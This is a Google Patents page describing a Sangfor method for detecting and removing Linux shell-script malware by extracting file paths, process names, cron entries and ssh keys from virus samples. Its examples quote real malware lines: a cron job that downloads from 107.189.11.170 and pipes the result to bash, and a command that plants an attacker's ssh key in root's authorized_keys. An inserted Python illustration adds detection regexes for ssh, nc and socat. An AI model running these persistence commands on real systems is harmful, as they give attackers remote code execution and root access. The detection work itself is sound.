CN111723372A - Virus checking and killing method and device and computer readable storage medium - Google Patents


Info

Publication number: CN111723372A
Authority: CN (China)
Prior art keywords: virus, shell script, sample shell, character string, detected
Legal status: Granted
Application number: CN202010578310.7A
Other languages: Chinese (zh)
Other versions: CN111723372B
Inventor: 范楷朋
Current Assignee: Sangfor Technologies Co Ltd
Original Assignee: Sangfor Technologies Co Ltd
Events: application filed by Sangfor Technologies Co Ltd; priority to CN202010578310.7A; publication of CN111723372A; application granted; publication of CN111723372B; legal status: active

Classifications

    • G06F21/56 Computer malware detection or handling, e.g. anti-virus arrangements (under G06F21/00 Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity; G06F21/50 Monitoring users, programs or devices to maintain the integrity of platforms; G06F21/55 Detecting local intrusion or implementing counter-measures)
    • G06F21/562 Static detection
    • G06F21/563 Static detection by source code analysis
    • G06F21/568 Eliminating virus, restoring damaged files
    • G06F2221/033 Test or assess software (indexing scheme relating to G06F21/50, monitoring users, programs or devices to maintain the integrity of platforms)
    • Y02D10/00 Energy efficient computing, e.g. low power processors, power management or thermal management

Abstract

The invention discloses a virus checking and killing method, a virus checking and killing device and a computer readable storage medium. The method comprises the following steps: acquiring a set of objects to be detected in a device to be detected; matching the set of objects to be detected against a first feature item set to obtain a first matching result, wherein the first feature item set is generated from a sample shell script corresponding to a virus; and, when the first matching result is a successful match, determining that the virus exists in the device to be detected and clearing the virus from the device to be detected. By matching the set of objects to be detected against the first feature item set generated from the sample shell script corresponding to the virus, and clearing the virus when the match succeeds, the method removes the virus from the device to be detected.

Description

Virus checking and killing method and device and computer readable storage medium
Technical Field
The present invention relates to the field of virus detection and removal, and in particular to a virus checking and killing method, a virus checking and killing device and a computer readable storage medium.
Background
The method currently used in the industry to check and kill Linux viruses is static file scanning: features are scanned for in the ELF files and shell scripts of the device system to be detected, and a file and its process are isolated if they are found to be malicious. However, most Linux viruses are shell scripts, which are heavily obfuscated and therefore difficult for virus killing engines to detect; moreover, with the rise of fileless techniques, such viruses persist through other means, so that even when the engine does detect and remove the virus file, the device is frequently reinfected and the virus cannot be thoroughly removed.
The above is provided only to assist understanding of the technical solution of the present invention and is not an admission that it constitutes prior art.
Disclosure of Invention
The main object of the present invention is to provide a virus checking and killing method, a virus checking and killing device and a computer readable storage medium, so as to solve the technical problem in the prior art that viruses, and the persistence mechanisms by which they keep attacking, are difficult to detect, with the result that viruses are repeatedly reinfected and cannot be thoroughly removed.
To achieve the above object, the present invention provides a virus checking and killing method comprising the following steps:
acquiring a set of objects to be detected in a device to be detected;
matching the set of objects to be detected against a first feature item set to obtain a first matching result, wherein the first feature item set is generated from a sample shell script corresponding to a virus;
and, when the first matching result is a successful match, determining that a virus exists in the device to be detected and clearing the virus from the device to be detected.
Preferably, the first feature item set includes a virus file path feature, and before acquiring the set of objects to be detected in the device to be detected, the virus checking and killing method further includes:
traversing the sample shell scripts, taking each traversed sample shell script in turn as the current sample shell script;
searching the current sample shell script, by means of a first regular expression, for a first code segment carrying a virus file path feature;
extracting, from the first code segment, a first character string located after a first preset identifier;
and obtaining a virus file path feature from the first character string and adding the virus file path feature to the first feature item set.
Preferably, obtaining the virus file path feature from the first character string includes:
judging whether the first character string contains a preset character;
if the first character string contains the preset character, using the first character string itself as the virus file path feature;
and if the first character string does not contain the preset character, converting the first character string to obtain a converted first character string, and using the converted first character string as the virus file path feature.
Preferably, the first feature item set includes a virus process name feature, and before acquiring the set of objects to be detected in the device to be detected, the virus checking and killing method further includes:
traversing the sample shell scripts, taking each traversed sample shell script in turn as the current sample shell script;
searching the current sample shell script, by means of a second regular expression, for a second code segment carrying a virus process name feature;
extracting, from the second code segment, a second character string located after a second preset identifier;
and using the extracted second character string as a virus process name feature and adding the virus process name feature to the first feature item set.
Preferably, the first feature item set includes a scheduled task feature, and before acquiring the set of objects to be detected in the device to be detected, the virus checking and killing method further includes:
traversing the sample shell scripts, taking each traversed sample shell script in turn as the current sample shell script;
searching the current sample shell script, by means of a third regular expression, for a third code segment carrying a scheduled task feature;
extracting, from the third code segment, a third character string located between third preset identifiers;
and using the extracted third character string as a scheduled task feature and adding the scheduled task feature to the first feature item set.
Preferably, the first feature item set includes a network connection tool feature, and before acquiring the set of objects to be detected in the device to be detected, the virus checking and killing method further includes:
traversing the sample shell scripts, taking each traversed sample shell script in turn as the current sample shell script;
searching the current sample shell script, by means of a fourth regular expression, for a fourth code segment carrying a network connection tool feature;
extracting, from the fourth code segment, a fourth character string located between fourth preset identifiers;
and using the extracted fourth character string as a network connection tool feature and adding the network connection tool feature to the first feature item set.
Preferably, matching the set of objects to be detected against the first feature item set includes:
matching the set of objects to be detected against a configuration file, wherein the configuration file comprises the first feature item set and a second feature item set, the first feature item set being generated from the code in the sample shell script that performs malicious behaviour, and the second feature item set being generated from the code in the sample shell script that clears other viruses.
Preferably, the second feature item set includes a virus file name feature for clearing other viruses, and before acquiring the set of objects to be detected in the device to be detected, the virus checking and killing method further includes:
traversing the sample shell scripts, taking each traversed sample shell script in turn as the current sample shell script;
searching the current sample shell script, by means of a fifth regular expression, for a fifth code segment carrying a virus file name feature for clearing other viruses;
extracting, from the fifth code segment, a fifth character string located after a fifth preset identifier;
and using the extracted fifth character string as a virus file name feature for clearing other viruses and adding it to the second feature item set.
Preferably, the second feature item set includes a virus process name feature for clearing other viruses, and before acquiring the set of objects to be detected in the device to be detected, the virus checking and killing method further includes:
traversing the sample shell scripts, taking each traversed sample shell script in turn as the current sample shell script;
searching the current sample shell script, by means of a sixth regular expression, for a sixth code segment carrying a virus process name feature for clearing other viruses;
extracting, from the sixth code segment, a sixth character string located after a sixth preset identifier;
and using the extracted sixth character string as a virus process name feature for clearing other viruses and adding it to the second feature item set.
Preferably, the second feature item set includes a listening port feature, and before acquiring the set of objects to be detected in the device to be detected, the virus checking and killing method further includes:
traversing the sample shell scripts, taking each traversed sample shell script in turn as the current sample shell script;
searching the current sample shell script, by means of a seventh regular expression, for a seventh code segment carrying a listening port feature;
extracting, from the seventh code segment, a seventh character string located after a seventh preset identifier;
and obtaining a listening port feature from the seventh character string and adding the listening port feature to the second feature item set.
Preferably, obtaining the listening port feature from the seventh character string includes:
judging whether the seventh character string is a preset normal service port;
and if it is not, using the seventh character string as the listening port feature.
Preferably, the second feature item set includes a communication tool feature, and before acquiring the set of objects to be detected in the device to be detected, the virus checking and killing method further includes:
traversing the sample shell scripts, taking each traversed sample shell script in turn as the current sample shell script;
searching the current sample shell script, by means of an eighth regular expression, for an eighth code segment carrying a communication tool feature;
and using the eighth code segment itself as a communication tool feature and adding the communication tool feature to the second feature item set.
Preferably, clearing the virus from the device to be detected includes:
removing, from the set of objects to be detected in the device to be detected, every object that was successfully matched against the first feature item set.
Preferably, after traversing the sample shell scripts and taking the traversed sample shell script as the current sample shell script, the method further includes:
judging whether the current sample shell script is in an encrypted state;
and if it is judged to be in an encrypted state, decrypting the current sample shell script.
In addition, to achieve the above object, the present invention also provides a virus checking and killing device comprising a memory, a processor, and a virus checking and killing program stored in the memory and executable on the processor, wherein the virus checking and killing program is configured to implement the steps of the virus checking and killing method described above.
In addition, to achieve the above object, the present invention further provides a computer readable storage medium on which a virus checking and killing program is stored, wherein the virus checking and killing program, when executed by a processor, implements the steps of the virus checking and killing method described above.
According to the invention, the set of objects to be detected is matched against the first feature item set generated from the sample shell script corresponding to the virus, and when the match succeeds the virus is cleared from the device to be detected.
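As an added illustration of the second feature item set (not the patent holder's implementation), the following Python extracts the features that a sample shell script exposes through its own "clear other viruses" code, applies the preset-normal-service-port filter, and writes both feature item sets into the configuration file that the matching step reads. The fifth to eighth regular expressions and preset identifiers are assumptions (rm -rf <path>, pkill/killall <name>, netstat ... :<port>, and lines using a remote-shell tool); the sample script, names and ports are constructed.

```python
"""Second feature item set: features taken from the code with which a sample
shell script clears other (rival) viruses. Added example; assumed regexes."""
import json
import re

# Constructed sample script fragment; the names and ports are not real IoCs.
SAMPLE_SCRIPT = r"""#!/bin/sh
# clear competing miners before starting our own (constructed for illustration)
pkill -f rivald
killall -9 rival-worker
rm -rf /tmp/rivalminer
rm -rf /var/tmp/.cache/x
netstat -anp | grep :5555 | awk '{print $7}' | cut -d/ -f1 | xargs kill -9
netstat -anp | grep :22 | awk '{print $7}' | cut -d/ -f1 | xargs kill -9
ssh -o StrictHostKeyChecking=no root@10.0.0.2 "uptime"
"""

# Assumed "preset normal service ports": a match on these is not a feature.
NORMAL_SERVICE_PORTS = {22, 25, 53, 80, 443}

RE_RM = re.compile(r"\brm\s+-rf?\s+(\S+)")                          # fifth regex
RE_KILL = re.compile(r"\b(?:pkill|killall)\s+(?:-\S+\s+)*(\S+)")    # sixth regex
RE_PORT = re.compile(r"\bnetstat\b[^\n]*?:(\d{1,5})\b")              # seventh regex
RE_COMM = re.compile(r"^.*\b(?:ssh|scp|nc|ncat|socat)\b.*$", re.M)   # eighth regex


def listening_port_feature(seventh_string: str):
    """Keep the port only if it is not a preset normal service port."""
    port = int(seventh_string)
    return None if port in NORMAL_SERVICE_PORTS else port


def extract_second_feature_set(script: str) -> dict:
    """Walk the script once per regex and collect the four feature kinds."""
    second = {"file_names": set(), "process_names": set(),
              "ports": set(), "comm_tools": set()}
    for m in RE_RM.finditer(script):            # fifth string: after "rm -rf"
        second["file_names"].add(m.group(1))
    for m in RE_KILL.finditer(script):          # sixth string: after pkill/killall
        second["process_names"].add(m.group(1))
    for m in RE_PORT.finditer(script):          # seventh string: after ":"
        port = listening_port_feature(m.group(1))
        if port is not None:
            second["ports"].add(port)
    for m in RE_COMM.finditer(script):          # eighth: the whole code segment
        second["comm_tools"].add(m.group(0).strip())
    return second


def build_config(first: dict, second: dict) -> str:
    """Serialise both feature item sets into the configuration file (JSON)."""
    cfg = {"first_feature_item_set": {k: sorted(v) for k, v in first.items()},
           "second_feature_item_set": {k: sorted(v) for k, v in second.items()}}
    return json.dumps(cfg, indent=2)


if __name__ == "__main__":
    second_set = extract_second_feature_set(SAMPLE_SCRIPT)
    print(build_config({"file_paths": {"/tmp/example"}}, second_set))
```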
Drawings
FIG. 1 is a schematic structural diagram of the virus checking and killing device in a hardware operating environment according to an embodiment of the present invention;
FIG. 2 is a schematic flow chart of a first embodiment of the virus checking and killing method according to the present invention;
FIG. 3 is a schematic flow chart of a second embodiment of the virus checking and killing method according to the present invention;
FIG. 4 is a schematic flow chart of a third embodiment of the virus checking and killing method according to the present invention;
FIG. 5 is a schematic flow chart of a fourth embodiment of the virus checking and killing method according to the present invention;
FIG. 6 is a schematic flow chart of a fifth embodiment of the virus checking and killing method according to the present invention;
FIG. 7 is a schematic flow chart of a sixth embodiment of the virus checking and killing method according to the present invention;
FIG. 8 is a schematic flow chart of a seventh embodiment of the virus checking and killing method according to the present invention;
FIG. 9 is a schematic flow chart of an eighth embodiment of the virus checking and killing method according to the present invention;
FIG. 10 is a schematic flow chart of a ninth embodiment of the virus checking and killing method according to the present invention;
FIG. 11 is a schematic flow chart of a tenth embodiment of the virus checking and killing method according to the present invention.
The implementation, functional features and advantages of the objects of the present invention will be further explained with reference to the accompanying drawings.
Detailed Description
It should be understood that the specific embodiments described herein are merely illustrative of the invention and are not intended to limit it.
As shown in FIG. 1, the virus checking and killing device may include a processor 1001 (such as a CPU), a communication bus 1002, a user interface 1003, a network interface 1004 and a memory 1005, wherein the communication bus 1002 provides the connections over which these components communicate. The user interface 1003 may include a display screen (Display) and an input unit such as a keyboard (Keyboard), and may optionally also include a standard wired interface or a wireless interface. The network interface 1004 may optionally include a standard wired interface or a wireless interface (for example, a Wi-Fi interface). The memory 1005 may be a high-speed RAM or a non-volatile memory (for example, a magnetic disk), and may alternatively be a storage device separate from the processor 1001.
Those skilled in the art will appreciate that the configuration shown in FIG. 1 is not intended to be limiting; the device may include more or fewer components than shown, some components may be combined, or the components may be arranged differently.
As shown in FIG. 1, the memory 1005, being a kind of computer storage medium, may contain an operating system, a network communication module, a user interface module and a virus checking and killing program.
In the virus checking and killing device shown in FIG. 1, the network interface 1004 is mainly used for data communication with an external network, and the user interface 1003 is mainly used for receiving input instructions from a user; the device has the processor 1001 call the virus checking and killing program stored in the memory 1005 and perform the following operations:
acquiring a set of objects to be detected in a device to be detected;
matching the set of objects to be detected against a first feature item set to obtain a first matching result, wherein the first feature item set is generated from a sample shell script corresponding to a virus;
and, when the first matching result is a successful match, determining that a virus exists in the device to be detected and clearing the virus from the device to be detected.
Further, the first feature item set includes a virus file path feature; before acquiring the set of objects to be detected in the device to be detected, the processor 1001 may call the virus checking and killing program stored in the memory 1005 and further perform the following operations:
traversing the sample shell scripts, taking each traversed sample shell script in turn as the current sample shell script;
searching the current sample shell script, by means of a first regular expression, for a first code segment carrying a virus file path feature;
extracting, from the first code segment, a first character string located after a first preset identifier;
and obtaining a virus file path feature from the first character string and adding the virus file path feature to the first feature item set.
Further, the processor 1001 may call the virus checking and killing program stored in the memory 1005 and further perform the following operations:
judging whether the first character string contains a preset character;
if the first character string contains the preset character, using the first character string itself as the virus file path feature;
and if the first character string does not contain the preset character, converting the first character string to obtain a converted first character string, and using the converted first character string as the virus file path feature.
Further, the first feature item set includes a virus process name feature; before acquiring the set of objects to be detected in the device to be detected, the processor 1001 may call the virus checking and killing program stored in the memory 1005 and further perform the following operations:
traversing the sample shell scripts, taking each traversed sample shell script in turn as the current sample shell script;
searching the current sample shell script, by means of a second regular expression, for a second code segment carrying a virus process name feature;
extracting, from the second code segment, a second character string located after a second preset identifier;
and using the extracted second character string as a virus process name feature and adding the virus process name feature to the first feature item set.
Further, the first feature item set includes a scheduled task feature; before acquiring the set of objects to be detected in the device to be detected, the processor 1001 may call the virus checking and killing program stored in the memory 1005 and further perform the following operations:
traversing the sample shell scripts, taking each traversed sample shell script in turn as the current sample shell script;
searching the current sample shell script, by means of a third regular expression, for a third code segment carrying a scheduled task feature;
extracting, from the third code segment, a third character string located between third preset identifiers;
and using the extracted third character string as a scheduled task feature and adding the scheduled task feature to the first feature item set.
Further, the first feature item set includes a network connection tool feature; before acquiring the set of objects to be detected in the device to be detected, the processor 1001 may call the virus checking and killing program stored in the memory 1005 and further perform the following operations:
traversing the sample shell scripts, taking each traversed sample shell script in turn as the current sample shell script;
searching the current sample shell script, by means of a fourth regular expression, for a fourth code segment carrying a network connection tool feature;
extracting, from the fourth code segment, a fourth character string located between fourth preset identifiers;
and using the extracted fourth character string as a network connection tool feature and adding the network connection tool feature to the first feature item set.
Further, the processor 1001 may call the virus checking and killing program stored in the memory 1005 and further perform the following operation:
matching the set of objects to be detected against a configuration file, wherein the configuration file comprises the first feature item set and a second feature item set, the first feature item set being generated from the code in the sample shell script that performs malicious behaviour, and the second feature item set being generated from the code in the sample shell script that clears other viruses.
Further, the second feature item set includes a virus file name feature for clearing other viruses; before acquiring the set of objects to be detected in the device to be detected, the processor 1001 may call the virus checking and killing program stored in the memory 1005 and further perform the following operations:
traversing the sample shell scripts, taking each traversed sample shell script in turn as the current sample shell script;
searching the current sample shell script, by means of a fifth regular expression, for a fifth code segment carrying a virus file name feature for clearing other viruses;
extracting, from the fifth code segment, a fifth character string located after a fifth preset identifier;
and using the extracted fifth character string as a virus file name feature for clearing other viruses and adding it to the second feature item set.
Further, the second feature item set includes a virus process name feature for clearing other viruses; before acquiring the set of objects to be detected in the device to be detected, the processor 1001 may call the virus checking and killing program stored in the memory 1005 and further perform the following operations:
traversing the sample shell scripts, taking each traversed sample shell script in turn as the current sample shell script;
searching the current sample shell script, by means of a sixth regular expression, for a sixth code segment carrying a virus process name feature for clearing other viruses;
extracting, from the sixth code segment, a sixth character string located after a sixth preset identifier;
and using the extracted sixth character string as a virus process name feature for clearing other viruses and adding it to the second feature item set.
Further, the second feature item set includes a listening port feature; before acquiring the set of objects to be detected in the device to be detected, the processor 1001 may call the virus checking and killing program stored in the memory 1005 and further perform the following operations:
traversing the sample shell scripts, taking each traversed sample shell script in turn as the current sample shell script;
searching the current sample shell script, by means of a seventh regular expression, for a seventh code segment carrying a listening port feature;
extracting, from the seventh code segment, a seventh character string located after a seventh preset identifier;
and obtaining a listening port feature from the seventh character string and adding the listening port feature to the second feature item set.
Further, the processor 1001 may call the virus checking and killing program stored in the memory 1005 and further perform the following operations:
judging whether the seventh character string is a preset normal service port;
and if it is not, using the seventh character string as the listening port feature.
Further, the second feature item set includes a communication tool feature; before acquiring the set of objects to be detected in the device to be detected, the processor 1001 may call the virus checking and killing program stored in the memory 1005 and further perform the following operations:
traversing the sample shell scripts, taking each traversed sample shell script in turn as the current sample shell script;
searching the current sample shell script, by means of an eighth regular expression, for an eighth code segment carrying a communication tool feature;
and using the eighth code segment itself as a communication tool feature and adding the communication tool feature to the second feature item set.
Further, the processor 1001 may call the virus checking and killing program stored in the memory 1005 and further perform the following operation:
removing, from the set of objects to be detected in the device to be detected, every object that was successfully matched against the first feature item set.
Further, after traversing the sample shell scripts and taking the traversed sample shell script as the current sample shell script, the processor 1001 may call the virus checking and killing program stored in the memory 1005 and further perform the following operations:
judging whether the current sample shell script is in an encrypted state;
and if it is judged to be in an encrypted state, decrypting the current sample shell script.
According to this scheme, the set of objects to be detected is matched against the first feature item set generated from the sample shell scripts corresponding to the viruses, and when the match succeeds the viruses are cleared from the device to be detected.
Based on the hardware structure, the embodiment of the virus searching and killing method is provided.
Referring to fig. 2, fig. 2 is a schematic flow chart of a virus killing method according to a first embodiment of the present invention.
In a first embodiment, the virus killing method comprises the following steps:
s10: acquiring a set of objects to be detected in equipment to be detected;
it can be understood that the device to be detected may be a device that needs to be subjected to virus detection, especially a device that needs to be subjected to Linux virus detection, and the device to be detected may be an electronic device such as a notebook computer, a desktop computer, a tablet computer, or a mobile phone.
The set of objects to be detected may include at least one of a process list and a timing task list of the device to be detected, for example. In a specific embodiment, a ps-elf command and a crontab-l command can be used to obtain a process list and a timed task list of the device to be tested, respectively.
S20: matching the set of objects to be detected with a first characteristic item set to obtain a first matching result, wherein the first characteristic item set is generated based on a sample shell script corresponding to a virus;
it should be understood that the first feature item set is generated based on a sample shell script corresponding to a virus, and the first feature item set comprises at least one of a virus file path feature, a virus process name feature, a timing task feature and a network connection tool feature. And matching the set of objects to be detected with the first feature item set, namely matching the objects in the set of objects to be detected with the features in the first feature item set in sequence, and generating a first matching result based on matching.
The sample shell scripts corresponding to the viruses can be obtained based on a historical database, that is, the sample shell scripts corresponding to the historical viruses are all stored in the historical database, for example, in the historical database, there may be a plurality of sample shell scripts corresponding to the viruses, for example, there may be 1000, 2000, and the like.
S30: and when the first matching result is successful matching, determining that viruses exist in the equipment to be detected, and clearing the viruses in the equipment to be detected.
It can be understood that, when the first matching result is that matching is successful, a virus is determined to be present in the device to be detected and is eliminated. In a specific embodiment, the removing of the viruses in the device to be detected includes removing those objects in the set of objects to be detected of the device to be detected that are successfully matched with the first feature item set.
According to the invention, the set of the object to be detected is matched with the first characteristic item set generated based on the sample shell script corresponding to the virus, and when the matching is successful, the virus in the equipment to be detected is eliminated.
Further, as shown in fig. 3, a second embodiment of the virus searching and killing method according to the present invention is proposed based on the first embodiment, in this embodiment, the first feature item set includes: virus file path characteristics;
before step S10, the virus killing method further includes:
S101: traversing the sample shell script, and taking the traversed sample shell script as the current sample shell script;
it can be understood that sample shell scripts corresponding to viruses are all stored in a historical database, when the sample shell scripts are required to be used, the sample shell scripts in the historical database are traversed, the traversed sample shell scripts are used as current sample shell scripts, and in the following embodiment, in the process of constructing the first feature item set, the current sample shell scripts are all operated.
S201: searching a first code segment with virus file path characteristics from the current sample shell script through a first regular expression;
It can be understood that after the current sample shell script is obtained, a first code segment is searched from the current sample shell script through a first regular expression, wherein virus file path characteristics exist in the first code segment. For example, the virus scripts all download their files through curl or wget, so the first code segment in which the curl or wget character string exists can be searched from the current sample shell script through the first regular expression, and the obtained first code segment is, for example, curl -fsSL http://thyrsi.com/t6/672/1550667479*1822611209.jpg -o /tmp/watchdogs.
S301: extracting a first character string positioned after a first preset identifier from the first code segment;
After obtaining the first code segment based on the first regular expression, the first character string located after the first preset identifier is further extracted from the first code segment. Continuing the above embodiment, the obtained first code segment is curl -fsSL http://thyrsi.com/t6/672/1550667479*1822611209.jpg -o /tmp/watchdogs, and extracting the first character string after the first preset identifier yields /tmp/watchdogs; that is, in this embodiment, the first preset identifier is -o, and the extracted first character string is /tmp/watchdogs.
S401: and obtaining a virus file path characteristic based on the first character string, and adding the virus file path characteristic to a first characteristic item set.
It should be understood that after the first character string is obtained, a virus file path feature is obtained based on the first character string, and the virus file path feature is added to the first feature item set to form a part of the first feature item set.
Further, the obtaining of the virus file path characteristics based on the first character string includes,
judging whether the first character string contains a preset character or not;
if the first character string contains the preset character, the first character string is used as a virus file path characteristic;
and if the first character string does not contain the preset character, converting the first character string to obtain a converted first character string, and taking the converted first character string as a virus file path characteristic.
It can be understood that after the first character string is obtained, it is first determined whether the first character string contains a preset character, and if the first character string contains the preset character, the first character string is directly used as a virus file path feature. Continuing with the above embodiment, for example, the preset character is set to /, and the obtained first character string is /tmp/watchdogs. It can be seen that the first character string contains the preset character, and therefore the obtained first character string can be directly used as the virus file path feature.
When the first character string does not include the preset character, the obtained first character string needs to be converted, and the converted first character string is used as a virus file path characteristic.
Taking the converted first character string as a virus file path characteristic is specifically divided into two cases:
In the first case: the first character string does not include $. For example, the obtained first character string is mspi139f; at this time, the cd command that switched the working directory needs to be searched for upwards, the directory found is spliced with the first character string to obtain /tmp/mspi139f, and /tmp/mspi139f is used as the virus file path feature.
In the second case: the first character string includes $. For example, the first character string is $cron; at this time, a string of the form cron=xxx needs to be searched for upwards, obtaining cron=/lib64/libgc++.so, and /lib64/libgc++.so is taken as the virus file path feature.
Further, after step S101, the virus killing method further includes:
judging whether the current sample shell script is in an encrypted state;
and if the judgment result is that the current sample shell script is in an encrypted state, decrypting the current sample shell script.
In the embodiment, after a current sample shell script is obtained, whether the current sample shell script is in an encrypted state is judged, if the judgment result shows that the current sample shell script is in the encrypted state, the current sample shell script is decrypted firstly, and then a step of determining a code segment from the current sample shell script based on a regular expression is executed; and if the judgment result shows that the current sample shell script is not in an encrypted state, directly executing the step of determining the code segments from the current sample shell script based on the regular expression.
Further, as shown in fig. 4, a third embodiment of the virus searching and killing method according to the present invention is proposed based on the first embodiment, in this embodiment, the first feature item set includes: a virus process name characteristic;
before step S10, the virus killing method further includes:
S102: traversing the sample shell script, and taking the traversed sample shell script as the current sample shell script;
it can be understood that sample shell scripts corresponding to viruses are all stored in a historical database, when the sample shell scripts are required to be used, the sample shell scripts in the historical database are traversed, the traversed sample shell scripts are used as current sample shell scripts, and in the following embodiment, in the process of constructing the first feature item set, the current sample shell scripts are all operated.
S202: searching a second code segment with virus process name characteristics from the current sample shell script through a second regular expression;
It can be understood that after the current sample shell script is obtained, a second code segment is searched from the current sample shell script through a second regular expression, wherein the second code segment has a virus process name characteristic. For example, the function of the nohup command is to run a process in the background, and viruses basically start their processes in this way, so the corresponding virus process name feature can be obtained by searching for the second code segment containing the nohup character string and then intercepting the second character string located after the second preset identifier. Specifically, a second code segment with the nohup character string may be searched from the current sample shell script through the second regular expression, and the obtained second code segment is, for example: nohup /lib64/launchUpdate.
For example, to run a virus process, the executable permission (x) must be added to the file, so the corresponding virus process name feature can also be obtained by searching for a second code segment containing the chmod +x character string and then intercepting the second character string located after the second preset identifier. Specifically, a second code segment with the chmod +x character string may be searched from the current sample shell script through the second regular expression, and the obtained second code segment is, for example: chmod +x mspi139f.
S302: extracting a second character string positioned behind a second preset identifier from the second code segment;
It is understood that, after obtaining the second code segment based on the second regular expression, the second character string located after the second preset identifier is further extracted from the second code segment. Continuing with the above embodiment, when the obtained second code segment is nohup /lib64/launchUpdate, the second character string after the second preset identifier is extracted to obtain launchUpdate; that is, in this embodiment, the second preset identifier is the last /, and the extracted second character string is launchUpdate.
When the obtained second code segment is chmod +x mspi139f, the second character string after the second preset identifier is extracted to obtain mspi139f; that is, in this embodiment, the second preset identifier is chmod +x, and the extracted second character string is mspi139f.
S402: and taking the extracted second character string as a virus process name characteristic, and adding the virus process name characteristic to a first characteristic item set.
It should be understood that after the second character string is obtained, the extracted second character string is taken as a virus process name feature, and the virus process name feature is added to the first feature item set to form a part of the first feature item set.
Further, as shown in fig. 5, a fourth embodiment of the virus searching and killing method according to the present invention is proposed based on the first embodiment, in this embodiment, the first feature item set includes: a timed task feature;
before step S10, the virus killing method further includes:
S103: traversing the sample shell script, and taking the traversed sample shell script as the current sample shell script;
it can be understood that sample shell scripts corresponding to viruses are all stored in a historical database, when the sample shell scripts are required to be used, the sample shell scripts in the historical database are traversed, the traversed sample shell scripts are used as current sample shell scripts, and in the following embodiment, in the process of constructing the first feature item set, the current sample shell scripts are all operated.
S203: searching a third code segment with timing task characteristics from the current sample shell script through a third regular expression;
It is to be understood that after the current sample shell script is obtained, a third code segment is searched from the current sample shell script through a third regular expression, wherein a timing task characteristic exists in the third code segment. For example, the third code segment is searched for by a third regular expression 'echo.+>.+/var/spool/cron/.+', 'echo.+>.+/etc/cron.d/.+' or 'echo.+|.+crontab -', and then a third character string located between third preset marks is intercepted, so that the corresponding timing task feature can be obtained. Specifically, the third code segment searched from the current sample shell script by these regular expressions is echo -e "*/1 * * * * root (curl -s http://107.189.11.170/2start.jpg||wget -q -O- http://107.189.11.170/2start.jpg)|bash -sh\n##" > /etc/cron.d/root.
S303: extracting a third string located between third preset identifications from the third code segment;
It is understood that after obtaining the third code segment based on the third regular expression, a third string located between third preset identifiers is further extracted from the third code segment. Continuing the above embodiment, when the obtained third code segment is echo -e "*/1 * * * * root (curl -s http://107.189.11.170/2start.jpg||wget -q -O- http://107.189.11.170/2start.jpg)|bash -sh\n##" > /etc/cron.d/root, the third character string located between the third preset marks is extracted to obtain */1 * * * * root (curl -s http://107.189.11.170/2start.jpg||wget -q -O- http://107.189.11.170/2start.jpg)|bash -sh\n##; that is, in this embodiment, the third preset mark is the double quote ", and the extracted third string is */1 * * * * root (curl -s http://107.189.11.170/2start.jpg||wget -q -O- http://107.189.11.170/2start.jpg)|bash -sh\n##.
S403: and taking the extracted third character string as a timing task characteristic, and adding the timing task characteristic to a first characteristic item set.
It should be understood that after the third string is obtained, the extracted third string is taken as a timing task feature, and the timing task feature is added to the first feature item set to form a part of the first feature item set.
Further, as shown in fig. 6, a fifth embodiment of the virus searching and killing method according to the present invention is proposed based on the first embodiment, in this embodiment, the first feature item set includes: a network connection tool feature;
before step S10, the virus killing method further includes:
S104: traversing the sample shell script, and taking the traversed sample shell script as the current sample shell script;
it can be understood that sample shell scripts corresponding to viruses are all stored in a historical database, when the sample shell scripts are required to be used, the sample shell scripts in the historical database are traversed, the traversed sample shell scripts are used as current sample shell scripts, and in the following embodiment, in the process of constructing the first feature item set, the current sample shell scripts are all operated.
S204: searching a fourth code segment with network connection tool characteristics from the current sample shell script through a fourth regular expression;
It can be understood that after the current sample shell script is obtained, a fourth code segment is searched from the current sample shell script through a fourth regular expression, wherein a network connection tool characteristic exists in the fourth code segment. For example, the fourth code segment is searched through a fourth regular expression 'echo.+>/root/.ssh/authorized_keys', and then a fourth character string located between fourth preset identifications is intercepted, so that the corresponding network connection tool feature can be obtained. Specifically, the fourth code segment that is looked up from the current sample shell script by 'echo.+>/root/.ssh/authorized_keys' is echo "ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAv54nagwgwgm626zrsUeI0bnVYgjgs/ux7v5phk1bZYFHEm+3Aa0gfu5yqdnhp01abaKxWJ97mrM5a2VAfTN+n6kwnrzpazpahtiuhnusw7E" > /root/.ssh/authorized_keys.
S304: extracting a fourth character string positioned between fourth preset identifications from the fourth code segment;
It is understood that, after obtaining the fourth code segment based on the fourth regular expression, a fourth character string located between fourth preset identifiers is further extracted from the fourth code segment. Continuing the above embodiment, when the obtained fourth code segment is echo "ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAv54nagwgwgm626zrsUeI0bnVYgjgs/ux7v5phk1bZYFHEm+3Aa0gfu5yqdnhp01abaKxWJ97mrM5a2VAfTN+n6kwnrzpazpahtiuhnusw7E" > /root/.ssh/authorized_keys, the fourth character string located between the fourth preset marks is extracted to obtain ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAv54nagwgwgm626zrsUeI0bnVYgjgs/ux7v5phk1bZYFHEm+3Aa0gfu5yqdnhp01abaKxWJ97mrM5a2VAfTN+n6kwnrzpazpahtiuhnusw7E; that is, in this embodiment, the fourth preset mark is the double quote ", and the extracted fourth character string is the ssh-rsa public key string between the quotes.
S404: and taking the extracted fourth character string as a network connection tool feature, and adding the network connection tool feature into the first feature item set.
It should be understood that, after obtaining the fourth character string, the extracted fourth character string is taken as a network connection tool feature, and the network connection tool feature is added to the first feature item set to form a part of the first feature item set.
Further, as shown in fig. 7, a sixth embodiment of the virus searching and killing method according to the present invention is proposed based on the first embodiment, and in this embodiment, step S20 includes,
and S20', matching the set of objects to be detected with a configuration file, wherein the configuration file comprises a first characteristic item set and a second characteristic item set, the first characteristic item set is generated through codes for carrying out malicious behaviors in a sample shell script, and the second characteristic item set is generated through codes for eliminating other viruses in the sample shell script.
It can be understood that, in order to detect the virus in the device to be detected more comprehensively, the set of objects to be detected may be matched with the configuration file, where the configuration file includes not only the first characteristic item set but also the second characteristic item set, so that the matching range of the objects to be detected in the device to be detected is expanded, and the virus in the device to be detected may be searched more comprehensively. The first characteristic item set is generated through codes which are based on malicious behaviors in the sample shell script, and the second characteristic item set is generated through codes which are based on other virus elimination in the sample shell script.
